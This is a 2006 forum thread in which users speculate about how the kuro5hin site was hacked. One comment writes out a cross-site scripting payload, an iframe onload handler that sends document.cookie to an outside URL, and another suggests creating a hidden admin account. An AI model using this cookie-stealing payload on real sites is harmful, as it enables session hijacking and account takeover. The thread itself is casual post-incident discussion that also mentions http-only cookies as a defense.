k5 got hacked? by blixco (4.00 / 1) #9 Thu Jun 15, 2006 at 08:00:32 AM EST
I wanna read all about it!  Links, anyone?
---------------------------------
Taken out of context I must seem so strange - Ani DiFranco


Rusty's diary by hulver (4.00 / 1) #10 Thu Jun 15, 2006 at 08:12:18 AM EST
http://www.kuro5hin.org/story/2006/6/14/18650/8795

Not much on the details though. I'd like to know exactly how they did it. I'm betting they stole an admin users session cookie.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

If I were to have done it by gazbo (4.00 / 1) #11 Thu Jun 15, 2006 at 08:28:21 AM EST
I'd create a link to a search page, and one of search URL parameters (say, the search type) would be a URL encoded version of a bit of HTML and event handlers - something like:


<iframe onload="window.location = 'http://my.site.com/pwned.html?cookie=' + document.cookie;" />

So that is echoed back to the user inside a table cell, and as it loads (iframe is used solely for the onload event handler) it broadcasts the cookie to whoever is interested.

I've not tried this or even thought about it too hard, but looking at the patch I can't see why this wouldn't work - specifically I'm not sure why a buffer overflow was mentioned at all.


"Engarde!" cried the larvae, huskily. - Scrymarch

[ Parent ]

Me too by hulver (4.00 / 1) #12 Thu Jun 15, 2006 at 08:41:24 AM EST
I'd have done something similar.

I think buffer overflow was mentioned because somebody saw "%3F%4E" etc in the url and thought "I don't understand that, it must be a buffer overflow".

If it was originally linked to last measure or something similar then it was fairly un-subtle. Good way to announce "I've found a hole, ha ha", but not a good way to permanently take over the site.

A determined attacker could have just made themselves an admin user and modified the cabal box to not display their name. They could then have had weeks to do whatever they liked. Maybe they did.

Note to self. Add "http-only" flag to cookies. Not that it helps for firefox.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

Rusty's most recent diary by gazbo (4.00 / 1) #16 Thu Jun 15, 2006 at 11:55:19 AM EST
Has a link to a full explanation.

The long and short of it is that it's what we said.


"Engarde!" cried the larvae, huskily. - Scrymarch

[ Parent ]

Yes. by aphrael (4.00 / 1) #20 Thu Jun 15, 2006 at 02:50:18 PM EST
We were very lucky in that the hacker in question wasn't subtle. He called attention to himself rather than slowly worming his way in.

If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]

He says by Rogerborg (2.00 / 0) #22 Thu Jun 15, 2006 at 04:34:30 PM EST
First, you steal all the money.  THEN you invite a mob in to burn down the bank and hide the evidence.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]

there's money to steal at k5? by aphrael (4.00 / 1) #23 Thu Jun 15, 2006 at 05:07:49 PM EST
Well, a yatch by Rogerborg (2.00 / 0) #24 Thu Jun 15, 2006 at 06:56:08 PM EST
I am not going to get started on the CMF slush fund, I am not going to get started on the CMF slush fund.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]

too late. by aphrael (2.00 / 0) #25 Thu Jun 15, 2006 at 07:03:43 PM EST
besides, how many years has it been? what's your burn rate?

If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]

so you're saying by aphrael (4.00 / 1) #26 Thu Jun 15, 2006 at 07:04:07 PM EST

Login
Make a new account
Username:
Password: